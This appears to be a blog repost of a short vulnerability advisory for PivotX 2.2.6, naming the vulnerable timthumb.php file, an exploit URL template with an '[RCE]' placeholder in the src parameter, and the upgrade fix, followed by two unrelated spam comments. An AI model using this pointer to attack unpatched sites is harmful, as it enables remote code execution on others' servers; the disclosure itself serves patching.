Pivotx TimThumb Remote Code Execution Vuln

[o] PivotX <= Remote Code Execution Vulnerability

Software : PivotX ver 2.2.6
Vendor : http://pivotx.net/
Original Author : MaXe [ http://www.exploit-db.com/exploits/17602/ ]



[o] Vulnerability

pivotx/includes/timthumb.php



[o] Exploit

http://localhost/pivotx/includes/timthumb.php?src=[RCE]



[o] Fix

Upgrade to new version (2.3.0)

2 Responses so far.

  1. Tina says:

    My company needed a dynamics gp and we had to find someone who knew the best steps to take, these guys were the best!

  2. Brian says:

    Thanks for the great article. I needed help with getting together my small business web development and I found many great resources on the web.